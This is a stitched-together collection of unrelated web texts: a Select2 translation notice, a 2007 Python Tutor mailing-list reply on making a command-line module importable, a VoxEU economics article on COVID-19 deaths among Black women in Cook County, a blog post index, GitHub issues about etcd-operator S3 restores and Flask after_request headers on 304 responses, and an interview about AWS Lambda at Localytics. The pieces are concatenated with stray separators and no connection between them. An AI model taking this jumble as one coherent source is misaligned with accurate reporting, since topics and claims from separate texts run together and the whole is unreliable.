English will still remain as the default language for Select2, though the translation files created by contributors will be migrated to the new format. Custom translations (those not provided by Select2) will need to be migrated over on their own, and instructions will be provided in the Select2 migration guide that will be created.
|
OPCFW_CODE
|
[Tutor] How does this work?
rabidpoobear at gmail.com
Wed Feb 7 19:06:11 CET 2007
Tony Cappellini wrote:
>> If I understand you, you have a python cmdline app that does something
>> useful. You have users who aren't comfortable with the command line, so
>> you are writing a GUI wrapper that calls the cmdline app with popen().
> That is correct
>> A better approach is to turn the functional part of the cmdline app -
>> the code that does the real work - into an importable module.
> it already is importable
>>> Then your GUI app can import and use this module directly, instead
> of doing hacks
>> with popen() and stdout.
> This all worked fine, until the author of the cmd line app stopped
> using stdout and started using the logging module. Now I cannot
> capture any output from his module.
>> You don't even need a separate module for the cmdline app if it is
>> written correctly - the command-line-specific part can be in an main()
>> function that is only called if the module is run as main.
> not totally true. It must be a stand-alone app, because there are
> people using it now and many don't want to use the gui.
> It is maintained completely independent of the gui by people other
> than myself.. Any changes in the cmdline app should not affect the
> gui. That was the intent by the author anyway. The use of the logging
> module happens to be an exception to this.
The application needs to be rewritten if this is true. The author's
implementation is not logical, if I'm inferring correctly that he knows
there are other apps depending on it. For example:

class Foo:
    def __init__(self):
        print "we're creating a new Foo and doing something useful here."

if __name__ == "__main__":
    f = Foo()
    #we can do stuff with our Foo instance here.
Notice that if this program is run as a regular script -- not imported
-- we create a Foo and we can use it for whatever.
All the functionality of the cmdline app is contained in the Foo class.
All that we have to do is propagate our data into it.
Now if we want to write a GUI for this, we just import this script, and
use the Foo object to do whatever we were doing in the
cmdline version -- no separate processes, threads, or any of that nastiness.
Because it's imported, the contents of the 'if __name__...' conditional
statement are never executed, so the cmdline functionality is disabled.
Hope that helps,
> Using popen() in a thread was a nice clean way to capture it's output.
> Perhaps the exec/eval isn't so clean it's just what first came to mind.
> I've already switched the exec/eval code to the import style.
> Tutor maillist - Tutor at python.org
More information about the Tutor
|
OPCFW_CODE
|
Among COVID-19 fatalities in the US, minorities are overrepresented (Yancy 2020) while women are underrepresented (Peckham et al. 2020). By looking at the intersection between race and gender, we uncover a Black female bias: while Black men are affected as much as White men, Black women are more affected than White women, and this is due to their lower socioeconomic status. The first and most harshly hit by the pandemic were Black women employed as frontline workers who commute on public transport from historically redlined blocks.
In a new paper (Bertocchi and Dimico 2021), we take advantage of extraordinarily detailed individual-level and georeferenced data on US daily deaths from COVID-19 and other causes provided by the Medical Examiner's Officer of Cook County, Illinois, the county that includes the metropolitan area of Chicago. The information includes race and ethnicity among a wide array of other individual characteristics such as gender, age, pre-existing conditions, and georeferenced home address. The present analysis is based on data up to 15 September 2020, covering the first wave of the epidemic in Cook County. Figure 1 shows the spatial distribution of COVID-19 deaths recorded since 16 March 2020, the day the first COVID-19 death was recorded. We superimpose on the map the boundaries of Census block groups.
Figure 1 COVID-19 deaths in Cook County, 16 March to 15 September 2020
We combine death data with US Census data on occupation by sector, public transport use, household crowding, and access to health insurance – down to the block group level of disaggregation. Since the county comprises almost 4,000 block groups, this represents a major advantage compared to other analyses of the racially differentiated impact of the pandemic (Almagro and Orane-Hutchinson 2020, McLaren 2020) that have been conducted at a state, county or, at best, ZIP code level (there are only 164 for Cook County). The resulting unique dataset allows us to jointly investigate the racial and gendered impact of COVID-19, its timing, its determinants, and its geography.
The Black female bias
Our dataset allows us to focus on the potential intersection between race and other demographic characteristics, notably gender. Preliminary correlational evidence suggests that, even after controlling for age and comorbidities, the probability of dying from COVID-19 has been particularly high for Black women, while Black men were not significantly more likely to die from the disease than White men.
To establish our main results, we employ information on all deaths (from COVID-19 and any other cause reported by the Medical Examiner) recorded from 1 January to 15 September in 2020 and 2019 and construct a cell-level panel, with cells aggregated at a race, census block group, week, and year level. The main outcome of interest is a measure of excess deaths for each race in a given block group and week in 2020, relative to the same race, block group, and week in 2019. Using an event study approach, we capture differential trends in deaths between years, pre-and post-COVID-19 weeks, and races. In Figure 2, we compare these differential trends for women and men.
Figure 2 Sex-disaggregated excess deaths for Blacks and Whites and Black-White excess death differential
Note: The plots report coefficients for fixed-effect regressions where the dependent variables are excess deaths for Blacks and Whites, by sex (females in top left panel, males in top right panel) and the Black-White differential in excess deaths, by sex (females in bottom left panel, males in bottom right panel). Vertical lines represent 95 percent confidence intervals. Data refers to deaths from any cause reported between 1 January and 15 September 2020 and 2019. Event time 0 corresponds to the week of 11 March.
The top two panels of Figure 2 show that excess deaths are near zero, as expected, in the weeks that precede the start of the epidemic. They shoot up in the second half of March 2020, when the epidemic starts, and are more numerous for males independently of race. However, we also observe that Black females outnumber White females (top left panel), while among males racial differences are much less pronounced (top right).
The bottom two panels confirm that the racial differential in excess deaths is larger and more prolonged for females (bottom left). This means that the racial disadvantage is largely attributable to Black females, who are hit by the epidemic earlier and more severely. In other words, a male bias is present only within the White population while, strikingly, within the Black population we do not observe any significant sex-related differences. To quantify, in the critical week of 8 April 2020, the Black-White differential in excess deaths was 3 percentage points and was entirely driven by Black women.
What drives the Black female bias?
The emergence of a Black female bias exposes an interaction between race and sex that had been so far overlooked. What explains it? A comparison across block groups reveals that it is driven by those with a larger population share in poverty. Differences in poverty rates absorb differences in the shares of people aged 65+ and with pre-existing conditions. This suggests that socioeconomic disparities, rather than demographic and biological differences, lie at the heart of the higher vulnerability of Black women. But what is it, among socioeconomic disparities, that can channel higher viral transmission and mortality?
We look at four potential and not mutually exclusive channels: jobs, use of public transport, housing crowding, and health insurance coverage. The first and second reflect the risk of contracting the virus at the workplace and on the way to work; the third can magnify transmission rates within the household; and the last affects access to medical care once contagion has occurred.
In order to assess whether the higher risk of contracting the virus at the workplace can explain the Black female bias in deaths, we compute the share of women and men employed in 20 industries, at the block group level. Splitting the sample between block groups with above- and below-median shares shows that the Black women’s death differential is explained by female employment in two key frontline, high-exposure sectors: health care and transportation/warehousing. These are sectors where Black women are overrepresented and that pay lower wages (Bertocchi 2020, Ross and Bateman 2019). Other high-exposure, low-pay jobs, for example in restaurants, where again Black women are heavily represented, do not explain death differentials, likely because the shutdown of the food sector protected their health, despite massive layoffs (Albanesi and Kim 2021, Alon et al. 2020).
A second contributing channel is the intensity in using public transport, which we measure with the share of people using it and the length of commute to work (Caselli et al. 2020). By contrast, we find no explanatory power for housing crowding, the diffusion of multigenerational families, and even lack of health insurance. Lastly, using the georeferenced home address of the deceased, we overlay the map of fatalities onto the redlining maps created in the 1930s in order to assess mortgage default risk (Bertocchi and Dimico 2020). We find that the diminished resilience of Black women is geographically concentrated in formerly low-graded blocks, which uncovers a persistent influence of historical racial segregation.
Thanks to a unique source of data, we have established that the COVID-19 death toll in Cook County has been disproportionately imposed on Black women employed in high-exposure, frontline jobs in the health care and transportation sectors, that they reach by public transport from the historically poor neighbourhoods where they reside.
Since we deal with the second most populous US county, which contains the third largest metropolitan area in the country, our findings do carry wider relevance. They also underline the need for granular data combining COVID-19 outcomes by race and sex with socioeconomic information. It is only through such data that scientists can produce evidence capable of guiding effective policy responses, including prioritisation strategies for vaccination campaigns, even after the emergency is over.
Albanesi, S and J Kim (2021), “The gendered impact of the COVID-19 recession on the US labor market”, NBER Working Paper No. 28505.
Almagro, M and A Orane-Hutchinson (2020), “The determinants of the differential exposure to COVID-19 in New York City and their evolution over time”, Covid Economics 13: 31–50.
Alon, A, M Doepke, J Olmstead-Rumsey and M Tertilt (2020), “The shecession (she-recession) of 2020: Causes and consequences”, VoxEU.org, 22 September.
Bertocchi, G (2020), “COVID-19 susceptibility, women, and work”, VoxEU.org, 23 April.
Bertocchi, G and A Dimico (2021), “COVID-19, race, and gender”, CEPR Discussion Paper No. 16000.
Bertocchi, G and A Dimico (2020), “Race and the COVID-19 pandemic”, VoxEU.org, 29 July.
Caselli, F G, F Grigoli, P Rente Lourenço, D Sandri and A Spilimbergo (2020), “The disproportionate impact of lockdowns on women and the young”, VoxEU.org, 15 January.
McLaren, J (2020), “Racial disparity in COVID-19 deaths: Seeking economic roots in census data”, VoxEU.org, 11 August.
Peckham, H, N M de Gruijter, C Raine et al. (2020), “Male sex identified by global COVID-19 meta-analysis as a risk factor for death and ITU admission”, Nature Communications 11: 6317.
Ross, M and N Bateman (2019), “Meet the low-wage workforce”, Brookings.
Yancy, C W (2020), “COVID-19 and African Americans”, Journal of the American Medical Association, Opinion, 15 April.
|
OPCFW_CODE
|
Disaster recovery from S3 fails when multiple backups with same timestamp
I copied our S3 backups folder from:
${BUCKET_NAME}/v1/${CLUSTER_NAME}/ to
${BUCKET_NAME}/v1/${NAMESPACE}/${CLUSTER_NAME}/
to enable restore from newer version of etcd-operator.
This caused all the backups S3 objects to have the same Last Modified timestamp, and until I deleted all but one of them, DR was cycling through seed pods over and over.
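For concreteness, the copy could plausibly have been done with something like the following; the aws s3 sync invocation is my assumption, only the bucket layout comes from the report. Server-side copies create new objects, so every copied backup ends up sharing the copy time as its Last-Modified, defeating any pick-the-newest-backup logic:
aws s3 sync \
  "s3://${BUCKET_NAME}/v1/${CLUSTER_NAME}/" \
  "s3://${BUCKET_NAME}/v1/${NAMESPACE}/${CLUSTER_NAME}/"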
Here are the etcd-operator logs from immediately after applying the etcdCluster object with kubectl:
time="2017-08-12T05:35:51Z" level=info msg="restoring cluster from existing backup (obfuscated)" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:35:51Z" level=info msg="backup sidecar deployment and service created" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:35:51Z" level=info msg="start running..." cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:35:56Z" level=info msg="apiserver closed watch stream, retrying after 5s..." pkg=controller
time="2017-08-12T05:35:59Z" level=warning msg="all etcd pods are dead. Trying to recover from a previous backup" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:35:59Z" level=info msg="cluster created with seed member (obfuscated-0000)" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:36:01Z" level=info msg="start watching at 471017" pkg=controller
time="2017-08-12T05:36:07Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0000])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:36:15Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0000])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:36:23Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0000])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:36:31Z" level=warning msg="all etcd pods are dead. Trying to recover from a previous backup" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:36:31Z" level=info msg="cluster created with seed member (obfuscated-0001)" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:36:39Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:36:47Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:36:55Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:03Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:11Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:19Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:27Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:35Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:43Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:51Z" level=info msg="skip reconciliation: running ([]), pending ([obfuscated-0001])" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:56Z" level=info msg="apiserver closed watch stream, retrying after 5s..." pkg=controller
time="2017-08-12T05:37:59Z" level=info msg="Start reconciling" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:59Z" level=info msg="running members: obfuscated-0001" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:37:59Z" level=info msg="cluster membership: obfuscated-0001" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:01Z" level=info msg="start watching at 471017" pkg=controller
time="2017-08-12T05:38:04Z" level=info msg="Finish reconciling" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:04Z" level=error msg="failed to reconcile: fail to add new member (obfuscated-0002): context deadline exceeded" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:17Z" level=error msg="failed to update members: context deadline exceeded" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:30Z" level=error msg="failed to update members: context deadline exceeded" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:39Z" level=info msg="Start reconciling" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:39Z" level=info msg="running members: obfuscated-0001" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:39Z" level=info msg="cluster membership: obfuscated-0002,obfuscated-0001" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:39Z" level=info msg="Disaster recovery" cluster-name=obfuscated pkg=cluster
time="2017-08-12T05:38:39Z" level=info msg="pods are still running (obfuscated-0001). Will try to make a latest backup from one of them." cluster-name=obfuscated pkg=cluster
The moment in the AWS console I deleted all but one of the backups, it started working and properly recovered the backup.
@snarlysodboxer
Can you provide more details about how to reproduce it?
I copied our S3 backups folder from:
${BUCKET_NAME}/v1/${CLUSTER_NAME}/ to
${BUCKET_NAME}/v1/${NAMESPACE}/${CLUSTER_NAME}/
to enable restore from newer version of etcd-operator.
Also, copying data within the S3 bucket like this is somewhat unexpected.
I'm closing this since it goes through an invalid path.
@snarlysodboxer Feel free to reopen if you have further questions.
|
GITHUB_ARCHIVE
|
@app.after_request not running when send_directory 304's
Expected Behavior
I am adding headers to the response of every request in my app (a pep 503 style web-app to serve out internally hosted python libraries). The extra header shows up in almost every response.
app = Flask(__name__)
@app.after_request
def extra_header(response):
response.headers['foo'] = 'bar'
return response
### pep 503 endpoint to serve pip installs
@app.route('/packages/<package_name>/<filename>')
def get_package(package_name, filename):
### logic to get library from internal databases
### directory, filename get defined here
return send_from_directory(directory, filename)
Then the users run pip install --index-url=<flask-app url>. Every request/response must include the custom header though, or it is blocked by internal gates.
Actual Behavior
When a user runs a pip install 'internal_library>1.2' or similar syntax without a --no-cache-dir option, pip sends a GET to the server with If-None-Match and If-Modified-Since headers. When those match, the web-server responds with status code 304 and headers that include ETag and Cache-Control, but not the custom headers specified in the after_request function.
Environment
Python version: 3.5.1
Flask version: 0.12.2
Werkzeug version: 0.12.2
I can't reproduce this issue as described. Nothing about send_file would be able to bypass after_request. I ran a sample application and observed the custom header with the 304 status code in the response.
from flask import Flask
from flask import send_from_directory
app = Flask(__name__)
@app.after_request
def special_header(response):
response.headers['foo'] = 'bar'
return response
@app.route("/")
def index():
return send_from_directory(".", "LICENSE.rst")
if __name__ == '__main__':
import requests
rv = requests.get(
"http://<IP_ADDRESS>:5000/static/LICENSE.rst",
headers={"If-None-Match": '"1561391683.603-1475-2062749753"'},
)
print(rv.status_code)
print(rv.headers['foo'])
$ FLASK_APP=example flask run
$ python example.py
304
bar
Also note that Flask 0.12 and Werkzeug 0.12 are no longer directly supported. The latest versions are Flask 1.1 and Werkzeug 0.15.
@davidism thanks for the quick response and tips on upgrading versions, looks like the default loads on our platform-as-a-service tooling are out of date. I upgraded to Flask 1.1 and Werkzeug 0.15 and still see the odd behavior of missing the custom headers only when send_from_directory returns the 304. However, when I create a toy example like your code has and run it on my local machine, I can't replicate the problem.
For posterity, the production app uses a handful of flask extensions including flask_cors, flask_bootstrap, and flask_nav but I couldn't trigger this weird behavior when I included them in the toy example either.
I'm happy to leave this closed for now since I can't replicate the problem outside of our platform-as-a-service environment and just including add_etags=False is a workaround solution. If I can ever replicate the problem I'll re-open this issue.
Thanks again for the help.
|
GITHUB_ARCHIVE
|
The .NET Stacks #47: 🧨 Now with 32 more bits
Make microservices fun again with Dapr
The .NET Stacks #46: 📒 What's new with your favorite IDE
Meet the .NET Upgrade Assistant, Your .NET 5 Moving Company
The .NET Stacks #45: 🔥 At last, hot reload is (initially) here
Instant Feedback Is Here: Introducing Hot Reload in .NET 6
The .NET Stacks #44: 🐦 APIs that are light as a feather
Working with the Blazor DynamicComponent
The .NET Stacks #43: 📅 DateTime might be seeing other people
Use Azure Static Web Apps with Azure DevOps pipelines
The .NET Stacks #42: 🔌 When Active Directory isn't so active
The .NET Stacks #41: 🎁 Your monthly preview fix has arrived
Blast Off with Blazor: Add a shared dialog component
Use C# to upload files to a GitHub repository
The .NET Stacks #40: 📚 Ignite is in the books
Ask About Azure: Why do resource groups need a location?
The .NET Stacks #39: 🔥 Is Dapr worth the hype?
Use API versioning in ASP.NET Core 5
The .NET Stacks #38: 📢 I hope you like announcements
Use Azure Functions with .NET 5
Dev Discussions: Cecil Phillip
The .NET Stacks #37: 😲 When your private NuGet feed isn't so private
Build a Blazor 'Copy to Clipboard' component with a Markdown editor
The .NET Stacks #36: ⚡ Azure Functions and some Microsoft history
How to nuke sensitive commits from your GitHub repository
The .NET Stacks #35: 🔑 Nothing is certain but death and expiring certificates
How to achieve style inheritance with Blazor CSS isolation
The .NET Stacks #34: 🎙 Visual Studio gets an update, and you get a rant
Signed HTTP Exchanges: A path for Blazor WebAssembly instant runtime loading?
The .NET Stacks #33: 🚀 A blazing conversation with Steve Sanderson
How to use configuration with C# 9 top-level programs
Dev Discussions: Steve Sanderson
The .NET Stacks #32: 😎 SSR is cool again
Blast Off with Blazor: Build a search-as-you-type box
The .NET Stacks #31: 🥳 10 things to kick off '21
More with Gruut: Use the Microsoft Bot Framework to analyze emotion with the Azure Face API
Blast Off with Blazor: Prerender a Blazor Web Assembly application
The .NET Stacks #30: 🥂 See ya, 2020
Blast Off with Blazor: Build a responsive image gallery
Blast Off with Blazor: Integrate Cosmos DB with Blazor WebAssembly
The .NET Stacks #29: More on route-to-code and some Kubernetes news
Use local function attributes with C# 9
Automate a Markdown links page with Pinboard and C#
The .NET Stacks, #28: The future of MVC and themes of .NET 6
Use ASP.NET Core route-to-code for simple JSON APIs
The .NET Stacks #27: Giving some 💜 to under-the-radar ASP.NET Core 5 features
Use Azure Functions, Azure Storage blobs, and Cosmos DB to copy images from public URLs
Blast Off with Blazor: Isolate and test your service dependencies
The .NET Stacks #26: .NET 5 has arrived, let's party
Simplify your ASP.NET Core API models with C# 9 records
Use OpenAPI, Swagger UI, and HttpRepl in ASP.NET Core 5 to supercharge your API development
The .NET Stacks #25: .NET 5 officially launches tomorrow
Blast Off with Blazor: Use .NET 5 to update the HTML head from a Blazor component
The .NET Stacks #24: Blazor readiness and James Hickey on Coravel
Are C# 9 records immutable by default?
Dev Discussions - James Hickey
The .NET Stacks #23: .NET 5 support, migration tools, and links
Blast Off with Blazor: Learn components and testing with a custom 404 page
Blast Off with Blazor: Get to know Blazor and our project
The .NET Stacks #22: .NET 5 RC 2 ships, .NET Foundation all hands, and links
C# 10 First Look: Constant string interpolation
Improve rendering performance with Blazor component virtualization
The .NET Stacks #21: Azure Static Web Apps, .NET 6 feedback, and more!
Blast Off with Blazor, Azure Functions, and Azure Static Web Apps
How to Docker with .NET: Getting Started
The .NET Stacks #20: Route to Code, IdentityServer, community links
The .NET Stacks #19: An Ignite recap and F# with Phillip Carter
The .NET Stacks #18: RC1 is here, the fate of .NET Standard, and F# with Isaac Abraham
Dev Discussions - Phillip Carter
Get to know your .NET streamers
The .NET Stacks #17: EF Core 5, Blazor + CSS, and community!
Dev Discussions - Isaac Abraham
The .NET Stacks #16: App trimming and more on ML.NET
Use CSS isolation in your Blazor projects
The .NET Stacks #15: The final preview and ML.NET with Luis Quintanilla
Dev Discussions - Luis Quintanilla (2 of 2)
NDepend: Boost Your Team's Code Quality
The .NET Stacks #14: Checking in on NuGet changes, many-to-many in EF Core, community roundup, and more!
Dev Discussions - Luis Quintanilla (1 of 2)
Use Project Tye to simplify your .NET microservice development experience (part 2)
The .NET Stacks #13: .NET 5 Preview 8 and Blazor, interview with Scott Addie, community links!
Use Project Tye to simplify your .NET microservice development experience (part 1)
The .NET Stacks #12: Azure DevOps or GitHub Actions, .NET Foundation results, community links!
Dev Discussions - Scott Addie
C# 9: Records Revisited
The .NET Stacks #11: Newtonsoft, async void, more with Jeremy Likness, more!
The .NET Stacks #10: .NET 5 taking shape, how approachable is .NET, a talk with Jeremy Likness, more!
Dev Discussions - Jeremy Likness (2 of 2)
Talk with Groot using the Microsoft Bot Framework and Azure sentiment analysis
The .NET Stacks #9: Project Coyote, new Razor editor, and more!
Dev Discussions - Jeremy Likness (1 of 2)
C# 9: Putting it all together with a scavenger hunt
The .NET Stacks #8: functional C# 9, .NET Foundation nominees, Azure community, more!
C# 9: Answering your questions
C# 9 Deep Dive: Target Typing and Covariant Returns
The .NET Stacks #7: Azure SDKs, testing, community roundup, more!
Dev Discussions - Michael Crump on contributing to the Azure community
C# 9 Deep Dive: Top-Level Programs
C# 9 Deep Dive: Pattern Matching
C# 9 Deep Dive: Records
The .NET Stacks #6: Blazor mobile bindings, EF update, ASP.NET Core A-Z, more!
C# 9 Deep Dive: Init-only features
Dev Discussions - Shahed Chowdhuri talks about his ASP.NET Core A-Z blog series
On simplifying null validation with C# 9
The .NET Stacks #5: gRPC-Web, play with C# 9, .NET Foundation, community roundup!
Reduce mental energy with C# 9
Party in the cloud with feature flags and Azure App Configuration
The .NET Stacks #4: EF Core, PresenceLight, community roundup!
Dev Discussions - Isaac Levin talks PresenceLight
The .NET Stacks #3: Native feature flags, local Kubernetes, community roundup!
Implement custom filters in your ASP.NET Core feature flags
The .NET Stacks #2: Project Tye, YARP, news, and community!
Using Microsoft.FeatureManagement.AspNetCore to filter actions and HTML
Introducing the Microsoft.FeatureManagement library
The .NET Stacks #1: Microsoft Build, announcements galore!
Introducing The .NET Stacks weekly newsletter
What I'm Reading (Week of 5/11/20)
What I'm Reading (Week of 5/4/20)
First Look: C# Source Generators
What I'm Reading (Week of 4/27/20)
What I'm Reading (Week of 4/20/20)
Compress Images in GitHub Using Imgbot
Tweeting New GitHub Pages Posts from GitHub Actions
What I'm Reading (Week of 4/14/20)
C# 8, A Year Late
What is a shell? 🐚 Is it a magic clam?
How to rename a Git branch
Keep Those Boolean Conditionals Simple
How 2018 Went
Level Up Your GitHub Experience with Chrome Extensions
Razor Support for ASP.NET Core Apps in Visual Studio Code
Share Blazor Components with Shared Class Libraries
GitHub tip: You don't need that .git extension to clone
Full-Stack Development in Visual Studio Code with ASP.NET Core
Using Anchor Links in Markdown
The AppCache API: Is It Worth It?
Publish your localhost with the World using Localtunnel
Exploring the Web Storage APIs
Exploring the Geolocation API
|
OPCFW_CODE
|
What should we do about dead listings?
There are a few pending flags on posts for applications/scripts/libraries where the advertised program no longer works, sometimes meaning that the link to the source code and/or binary is also dead.
It's not helpful for visitors to Stack Apps to find something that they can't even use, so it seems reasonable to do something about these posts…but I'm undecided as to what. Options include:
Outright deletion
Closing with another custom reason
Locking with the historical significance reason
Editing the post to include a warning
Merely posting a comment explaining the status in the hope that someone happens to see it
Shrug and do nothing
Some other option I didn't consider
I don't have very strong feelings at the moment which one is best, so I'm open to hearing about what everyone feels the approach to these dead posts should be.
Yes, obsolete listings (script / app / library) should, at the very least, be made obvious at a glance and ideally obvious in search results.
For reference, there are currently only 754 listings that are not placeholders (more on placeholders, below).
Delete sparingly; removing legacy content should be a last resort.
Posts can have historical value.
Even obsolete posts can provide useful ideas and/or code.
Stack Exchange does and should strive to preserve high scoring posts that were once valid. ("There are a large number of views, upvotes and inbound links on the post," etc.)
EXCEPTION: Many placeholder questions should probably be deleted. More on this below.
Keep listings with, say, a score of 5 regardless.
Only lock posts if they don't meet today's guidelines for acceptable posts (and have too much score to delete). My SWAG is that no listing will merit locking.
Otherwise, all listings should be updatable by whoever has the time, motivation, and skill to do so.
Closing would be ideal, because it has that nice banner at the top and has good mechanisms in place for dealing with such posts.
Note that this might trigger the Roomba on a few posts (currently 4 candidates that aren't already on hold) -- which may or may not be a good thing.
Tagging with obsolete. This is good and can help with both search and signaling listings that might get closed.
Plus: Anyone can do it or suggest it.
Minus 1: it's not enough to let the new/casual user realize that the listing is now salvage and/or historical.
Minus 2: Easy to remove (erroneously).
Leading the title with "OBSOLETE". This has the same advantages and disadvantages as tagging, but sends a much clearer signal to searchers.
Proposed Actions:
EDIT all such listings with the title prefix "OBSOLETE - ", and the tag obsolete. This can be done immediately and will help with all further actions.
Get that custom close reason added and use it.
Delete and/or lock if really deserved.
Possibly start closing abandoned placeholder apps as previously discussed, as these are an obvious source of (usually) no-value clutter.
Some of the placeholders that should be closed should also be deleted, and since they may have a (pity/newbie) score of 1, they won't get Roomba'd.
Per this SEDE query, here is a list of placeholders that perhaps should be closed. Update: the posts on the original list, from July 2018, have now all been closed.
Updatier: of the 13 original very-obsolete posts, all have now been closed:
These have been closed but need to be deleted (but may Roomba):
Stacked Up Comments [Placeholder]
Stack Exchange v2.2 PHP API Client
These have been closed and Roomba'd. Good Job! (Need 10K to see):
AnswerMachine (Placeholder)
Developing a new parenting app (Placeholder)
Browse StackOverflow community from iOS devices (placeholder)
Post to have write access (Placeholder)
PhoneGap Stack Overflow app (Placeholder)
Required Post for Write Access for android (Placeholder)
(Placeholder) A test app
Stack Exchange Eclipse Plugin (Placeholder)
Test Application Post (Placeholder)
Question analysis application (placeholder)
Placeholder for my application
I would vote for the historical lock option.
Straight deletion is harsh and someone somewhere may still need the information.
Creating a custom close reason could conceivably see posts erroneously voted closed.
A warning would have to be consistently worded for all posts to avoid any possibility of confusion in future readers.
A comment, with the best will in the world, won't get noticed.
Doing nothing doesn't address the problem.
Historical locks should only be used within the guidelines; and I suspect that very few of these obsolete posts will merit such.
|
STACK_EXCHANGE
|
Many developers see AWS Lambda as the serverless path of the future, eventually leading to NoOps -- automating the underlying IT environment to remove the human element of an IT team.
But, as with many new technologies, including the move to cloud, many enterprises are unsure how a serverless computing architecture will benefit them, and they remain unwilling to make the organizational and financial changes necessary to go serverless. Instead, they opt for services such as AWS Lambda to solve back-end problems within traditional cloud deployments: the service handles the underlying resources and takes management tasks off developers' plates, freeing them to write code. Developers can use AWS Lambda to absorb spikes in application traffic, for example, or to send text alerts when a certain event takes place in the cloud. Even so, not all businesses are making the leap.
Still, some savvy enterprises are taking a more heavily integrated approach to using AWS Lambda. Localytics, a Boston-based mobile engagement platform that focuses on analyzing mobile and web application usage, depends on a host of Amazon Web Services' offerings, including AWS Lambda, DynamoDB and Elastic MapReduce, to deliver services to customers. We spoke to Mohit Dilawari, senior engineering director, about how the company uses Lambda in its cloud deployment and where AWS could improve the service.
How does AWS Lambda help you achieve your IT objectives?
Mohit Dilawari: We have been an early adopter of Lambda for a while. The first Lambda [implementation] was while it was in beta; we were using [AWS Lambda] to process some of our event streams. Part of our offering is to give straight-up analytics on app usage. What we end up doing is processing data points or events from mobile apps within Amazon. We use Lambda as a way to process some of that data to glean interesting information about users.
We've connected Lambda to Kinesis. What we're putting onto the Kinesis Stream is all these data points that customers send to us. The Lambda [function] processes the data points and gets intelligent information out of there and stores it onto a [DynamoDB] database. We have about 22 Lambda [functions] in production -- we have chat bots and Slack bots that we use, and we have Lambda that helps us process data [and ones] that process S3 [Simple Storage Service] files. We use Lambda to its fullest extent.
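To make the shape of that pipeline concrete, here is a minimal Python sketch of a Kinesis-triggered Lambda handler along those lines. The table name and payload fields are assumptions for illustration; the interview doesn't describe Localytics' actual schema.

    import base64
    import json

    import boto3

    # "processed-events" is an assumed table name, not Localytics' real one.
    table = boto3.resource("dynamodb").Table("processed-events")

    def handler(event, context):
        # Lambda delivers Kinesis data as batches of base64-encoded records.
        for record in event["Records"]:
            data = json.loads(base64.b64decode(record["kinesis"]["data"]))
            # Derive something useful from the data point and persist it.
            table.put_item(Item={
                "user_id": data["user_id"],      # assumed payload field
                "event_name": data["event"],     # assumed payload field
                "arrived_at": int(record["kinesis"]["approximateArrivalTimestamp"]),
            })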
What's been the biggest challenge when adopting a serverless approach?
Dilawari: It is still a black box -- and that's the plus and minus. You go to Lambda because you don't want to deal with infrastructure. But when there are things going wrong, you're not quite sure what happened. Sometimes, log diving doesn't get you the answer you want. That is one aspect of it.
The second aspect, I would say, impacts the Slack bot integration, where you have these cold starts. There are times when, if you haven't invoked a Lambda [function] within a certain amount of time, it will take a while for the virtual machine to fire up, accept and process your request. A lot of times, Slack requests require a response within three seconds; if you're not able to respond within three seconds, you'll time out and you'll have to reissue the command. So, it gives a less-than-ideal experience on your Slack bot.
There are a lot of pros to [Lambda], but there are certain use cases where it wouldn't be my first go-to. When it comes to the Rail stack, Python, Django, even with Scala Play -- these are frameworks and tooling that have been around for many years, and they're highly optimized for building out web apps. You can do this with Lambda, but the tooling there is still a little immature, and it's a lot more work. With Lambda, it takes a little bit of time; you've got to add in authentication and piecemeal everything together.
What other serverless computing technologies did you consider?
Dilawari: We looked at Iron.io. We also looked at Google [Cloud] Functions. But we are an Amazon shop at the end of the day, and we trust Amazon. We have a really good relationship with them; we're not looking to add in any third parties. We don't want to put our [service-level agreements] on the line when a third party goes down. Amazon's got the huge advantage, because what they're doing, which is super smart, is building this entire ecosystem. I think they see Lambda as something that is the future of their platform. So, I think they're going to double down on this, or triple down on it.
How complex is it to tie other services with Lambda?
